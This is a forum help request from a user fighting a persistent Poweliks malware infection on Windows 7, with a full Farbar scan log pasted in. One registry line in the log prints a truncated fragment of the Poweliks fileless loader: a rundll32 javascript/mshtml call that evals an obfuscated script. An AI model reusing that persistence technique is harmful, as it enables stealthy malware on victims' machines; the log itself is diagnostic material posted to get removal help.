Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

poweliks infection, cant seem to kill it


  • This topic is locked This topic is locked
2 replies to this topic

#1 feralfreak

feralfreak

  • Members
  • 38 posts
  • OFFLINE
  •  
  • Local time:08:15 PM

Posted 26 October 2014 - 10:58 PM

ive been having some trouble with a bug that causes my dllhost.exe*32 to load multiple entries in task manager, and causes it to bog down my system making the cpu run at 100 percent(i can end the processes but they come back minutes later, eventually it makes the system crash to a bsd, and when i end processes on them if i do it on the right one it knocks the others down, but they all look the same so its tough to find it), makes powershell(whatever that is) stop working, i looked up what my problem might be and saw online references to powelik, did a scan with roguekiller and that confirmed the infection, but it hasnt been able to kill it, when i reboot the infection is still there after that tool says that it killed it, i also ran farbar and the log confimed that infection too

 

in the past ive had trouble on this pc with combofix(i was told to use it, not a matter of using it on my own) because this pc is an acer and didnt come with an oem disc, only a way to make recovery dvd's which proved to be an incompatibility with one of the steps needed in using combofix(i will NEVER buy acer again!)

 

ill paste the farbar frst log below:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 26-10-2014
Ran by adamlogan09052014 (administrator) on ADAMLOGAN-PC on 26-10-2014 23:07:11
Running from C:\Users\adamlogan09052014\Desktop
Loaded Profile: adamlogan09052014 (Available profiles: adamlogan11052012 & adamlogan10262013 & adamlogan09052014)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan 2.0\kss.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe
(alch) C:\Program Files (x86)\ClamWin\bin\ClamTray.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(PortableApps.com) F:\ThunderbirdPortable\ThunderbirdPortable.exe
(Mozilla Messaging) F:\ThunderbirdPortable\App\Thunderbird\thunderbird.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(mozilla.org) C:\Program Files (x86)\SeaMonkey\seamonkey.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [ClamWin] => C:\Program Files (x86)\ClamWin\bin\ClamTray.exe [86016 2013-04-27] (alch)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1486144 2013-05-13] (IObit)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...\Run: [Yahoo! Pager] => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [4670704 2007-08-30] (Yahoo! Inc.)
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...\MountPoints2: {813b7de2-21a9-11e3-9251-c89cdc6c6e74} - G:\Autorun.exe
HKU\S-1-5-21-2928345798-992241452-311034125-1011\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_12_0_0_70_ActiveX.exe -update activex
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://aol.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xB043194172C9CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files (x86)\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254

FireFox:
========
FF ProfilePath: C:\Users\adamlogan09052014\AppData\Roaming\Mozilla\Firefox\Profiles\25bza008.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_4_402_265.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @java.com/DTPlugin,version=10.17.2 -> C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.17.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_4_402_265.dll ()
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.5.1 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.3 -> C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Flash and Video Download - C:\Users\adamlogan09052014\AppData\Roaming\Mozilla\Firefox\Profiles\25bza008.default\Extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a} [2014-09-25]
FF Extension: Define Ext - C:\Program Files (x86)\Mozilla Firefox\extensions\wyzlmrij@zekkpxc.com [2013-09-16]
FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5
FF Extension: DivX Plus Web Player HTML5 &lt;video&gt; - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012-07-30]

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [hlbdjjeemlolafejlbganpfgepihjplk] - C:\ProgramData\wxDfast\hlbdjjeemlolafejlbganpfgepihjplk.crx []
CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2011-12-12]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 EFS; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [335168 2013-04-25] (IObit)
R3 KeyIso; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 KSS; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan 2.0\kss.exe [202328 2012-12-07] (Kaspersky Lab ZAO)
S2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.1.5354.0\AdAwareService.exe [702744 2014-01-23] ()
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2014-03-11] (Microsoft Corporation)
S3 Netlogon; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [347872 2014-03-11] (Microsoft Corporation)
S4 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
S4 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [File not signed]
S3 ProtectedStorage; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 SamSs; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 Spooler; C:\Windows\SysWOW64\spoolsv.exe [0 2013-10-26] () [File not signed]
S3 VaultSvc; C:\Windows\SysWOW64\lsass.exe [0 2013-10-26] () [File not signed]
S4 WSWNDA3100v2; C:\Program Files (x86)\NETGEAR\WNDA3100v2\WifiSvc.exe [307928 2013-12-30] ()

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R3 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [268512 2014-01-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [133928 2014-03-11] (Microsoft Corporation)
S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [34336 2013-03-26] (IObit.com)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-23] ()
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
R3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\UrlFilter.sys [23016 2013-03-26] (IObit.com)
S1 nzdegkzv; \??\C:\Windows\system32\drivers\nzdegkzv.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 23:06 - 2014-10-26 23:07 - 00000000 ____D () C:\FRST
2014-10-26 23:05 - 2014-10-26 23:05 - 02113024 _____ (Farbar) C:\Users\adamlogan09052014\Desktop\FRST64.exe
2014-10-23 04:03 - 2014-10-23 04:03 - 00002896 _____ () C:\Users\adamlogan09052014\Desktop\RKreport_SCN_10232014_040000.log
2014-10-23 03:45 - 2014-10-23 04:17 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-23 03:44 - 2014-10-23 03:44 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-23 03:28 - 2014-10-23 03:44 - 16281688 _____ () C:\Users\adamlogan09052014\Desktop\RogueKiller.exe
2014-10-22 23:54 - 2014-10-23 03:23 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-22 23:51 - 2014-10-23 03:23 - 00000000 ____D () C:\Users\adamlogan09052014\Desktop\mbar
2014-10-22 23:45 - 2014-10-22 23:51 - 14349744 _____ (Malwarebytes Corp.) C:\Users\adamlogan09052014\Desktop\mbar-1.07.0.1012.exe
2014-10-22 23:40 - 2014-10-22 23:40 - 00401920 _____ (Farbar) C:\Users\adamlogan09052014\Desktop\MiniToolBox.exe
2014-10-22 23:37 - 2014-10-22 23:37 - 00415232 _____ (Farbar) C:\Users\adamlogan09052014\Desktop\FSS.exe
2014-10-22 23:35 - 2014-10-22 23:35 - 00854448 _____ () C:\Users\adamlogan09052014\Desktop\SecurityCheck.exe
2014-10-22 23:32 - 2014-10-22 23:32 - 00373512 _____ () C:\Windows\Minidump\102214-64334-01.dmp
2014-10-22 17:43 - 2014-10-22 17:43 - 00373544 _____ () C:\Windows\Minidump\102214-49577-01.dmp
2014-10-22 07:35 - 2014-10-22 07:35 - 00000279 _____ () C:\Users\adamlogan09052014\Desktop\IObit Malware Fighter Report.log
2014-10-22 07:07 - 2014-10-22 07:07 - 00001177 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\Users\adamlogan09052014\AppData\Roaming\IObit
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\ProgramData\IObit
2014-10-22 07:07 - 2014-10-22 07:07 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-10-22 07:04 - 2014-10-22 07:06 - 19362952 _____ (IObit ) C:\Users\adamlogan09052014\Desktop\imfv2-setup-for-review.exe
2014-10-22 05:22 - 2014-10-22 05:22 - 00000000 ____D () C:\Users\adamlogan09052014\Desktop\New folder
2014-10-22 04:53 - 2014-10-22 04:53 - 01602014 _____ () C:\Users\adamlogan09052014\Desktop\Group1.zip
2014-10-22 04:53 - 2014-10-22 04:53 - 00000000 ____D () C:\Users\adamlogan09052014\AppData\Local\Symantec Power Eraser
2014-10-22 04:07 - 2014-10-22 04:08 - 00000000 ____D () C:\ProgramData\SMR430
2014-10-22 04:06 - 2014-10-22 04:06 - 00058016 _____ () C:\Windows\SysWOW64\GDIPFONTCACHEV1.DAT
2014-10-22 04:04 - 2014-10-22 04:05 - 07043752 _____ (Symantec Corporation) C:\Users\adamlogan09052014\Desktop\SymHelp.exe
2014-10-22 01:55 - 2014-10-22 01:54 - 01962496 _____ () C:\Users\adamlogan09052014\Desktop\AdwCleaner.exe
2014-10-10 10:41 - 2014-10-10 10:41 - 01700624 _____ () C:\Windows\Minidump\101014-56643-01.dmp
2014-10-10 04:34 - 2014-10-10 04:35 - 01375089 _____ () C:\Users\adamlogan09052014\Downloads\adwcleaner_3.311.exe
2014-10-09 22:13 - 2014-10-09 22:13 - 00373488 _____ () C:\Windows\Minidump\100914-32276-01.dmp
2014-10-09 20:35 - 2014-10-09 20:36 - 02476596 _____ (Trend Micro Inc.) C:\Users\adamlogan09052014\Downloads\HousecallLauncher64 (2).exe
2014-10-09 04:53 - 2014-10-09 04:54 - 00642096 _____ () C:\Windows\Minidump\100914-43227-01.dmp
2014-10-08 07:36 - 2014-10-08 07:36 - 00000000 ____D () C:\Users\adamlogan11052012\AppData\Roaming\AVG2015
2014-10-08 07:36 - 2014-10-08 07:36 - 00000000 ____D () C:\Users\adamlogan11052012\AppData\Local\Avg2015
2014-09-28 05:41 - 2014-09-28 05:41 - 08472669 _____ (alch ) C:\Users\adamlogan09052014\Downloads\clamwin-0.98.4.1-setup-nodb.exe
2014-09-27 03:45 - 2014-09-27 03:45 - 00373520 _____ () C:\Windows\Minidump\092714-56503-01.dmp

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 23:16 - 2012-07-10 01:07 - 02088125 _____ () C:\Windows\WindowsUpdate.log
2014-10-26 22:40 - 2009-07-14 00:45 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-26 22:40 - 2009-07-14 00:45 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-26 22:35 - 2014-09-20 05:00 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-26 22:33 - 2014-09-05 23:10 - 00000000 ____D () C:\Users\adamlogan09052014\AppData\Roaming\Thunderbird
2014-10-26 22:30 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-26 22:30 - 2009-07-14 00:51 - 00121130 _____ () C:\Windows\setupact.log
2014-10-22 23:54 - 2014-06-25 07:11 - 00128728 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-22 23:52 - 2014-06-25 07:10 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-22 23:33 - 2012-07-10 02:50 - 00000000 ____D () C:\Program Files (x86)\SeaMonkey
2014-10-22 23:32 - 2012-11-25 03:04 - 00000000 ____D () C:\Windows\Minidump
2014-10-22 23:31 - 2012-11-25 03:04 - 445944578 _____ () C:\Windows\MEMORY.DMP
2014-10-22 22:43 - 2013-07-12 03:14 - 00001586 _____ () C:\Windows\wininit.ini
2014-10-22 04:56 - 2012-11-08 02:39 - 00000000 ____D () C:\Users\adamlogan11052012
2014-10-22 02:56 - 2010-11-20 23:47 - 00300048 _____ () C:\Windows\PFRO.log
2014-10-22 02:53 - 2014-09-19 21:02 - 00000000 ____D () C:\AdwCleaner
2014-10-11 13:04 - 2014-09-05 22:18 - 00000000 ____D () C:\Users\adamlogan09052014\Desktop\reload as of 9 5 2014
2014-10-11 09:15 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\AppCompat
2014-10-11 09:13 - 2014-06-25 07:10 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-10 16:01 - 2013-05-17 06:22 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-10-10 11:32 - 2012-08-25 20:28 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-09 22:15 - 2013-10-26 07:46 - 00000000 ____D () C:\Users\adamlogan10262013
2014-10-09 22:15 - 2013-10-25 05:44 - 00000000 ____D () C:\Users\adamlogan10252013
2014-10-09 22:15 - 2012-10-24 01:10 - 00000000 ____D () C:\Users\adamlogan10242012
2014-10-09 22:15 - 2012-09-17 23:57 - 00000000 ____D () C:\Users\adamlogan09162012
2014-10-09 22:15 - 2012-09-02 00:42 - 00000000 ____D () C:\Users\adamlogan09022012
2014-10-09 22:15 - 2012-08-17 22:53 - 00000000 ____D () C:\Users\adamlogan08172012
2014-10-09 22:15 - 2012-08-03 22:09 - 00000000 ____D () C:\Users\adamlogan08032012
2014-10-09 22:15 - 2012-07-09 23:03 - 00000000 ____D () C:\Users\adamlogan
2014-10-09 21:04 - 2014-09-20 00:30 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-09 20:58 - 2014-09-20 05:07 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-09 20:52 - 2014-09-18 00:38 - 00183038 _____ () C:\Users\adamlogan09052014\AppData\Local\ars.cache
2014-10-09 20:52 - 2014-09-18 00:38 - 00101771 _____ () C:\Users\adamlogan09052014\AppData\Local\census.cache
2014-10-09 20:50 - 2014-09-18 00:35 - 00000010 _____ () C:\Users\adamlogan09052014\AppData\Local\sponge.last.runtime.cache

Files to move or delete:
====================
C:\Users\adamlogan11052012\jagex_cl_runescape_LIVE.dat
C:\Users\adamlogan11052012\jagex_cl_runescape_LIVE1.dat
C:\Users\adamlogan11052012\random.dat
C:\ProgramData\2lc0b17.fvv
C:\ProgramData\2lc0b17.reg


Some content of TEMP:
====================
C:\Users\adamlogan09052014\AppData\Local\Temp\dllnt_dump.dll
C:\Users\adamlogan09052014\AppData\Local\Temp\Quarantine.exe
C:\Users\adamlogan09052014\AppData\Local\Temp\stuprt.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\2jfuweif.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\AskSLib.dll
C:\Users\adamlogan10252013\AppData\Local\Temp\htc-sync.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\IWX3U5NW.exe
C:\Users\adamlogan10252013\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\adamlogan10252013\AppData\Local\Temp\tbVafm.dll
C:\Users\adamlogan10252013\AppData\Local\Temp\vcredist_x64.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\2jfuweif.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\AskSLib.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpg_dqi0.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\htc-sync.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\InstallFlashPlayer.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\IWX3U5NW.exe
C:\Users\adamlogan11052012\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\tbVafm.dll
C:\Users\adamlogan11052012\AppData\Local\Temp\vcredist_x64.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-16 08:24

==================== End Of Log ============================

 

 

can someone help me kill this? i also cant download anything in internet explorer, i keep getting something saying my settings dont allow that, my histories folder wont keep more than a days worth of entries(i think its because of this bug) and i tried going into the internet options, i set it back to 21 days where it was set at 0(likely by the bug), but when that didnt work i tried going back to see if it was changed on me again, and the thing to click on to access internet options was greyed out(it was something in the little thing that looks like a gear, i can click on the gear, but after that the part i needed was greyed out. i wish i could find who wrote this bug and break his fingers off.

 

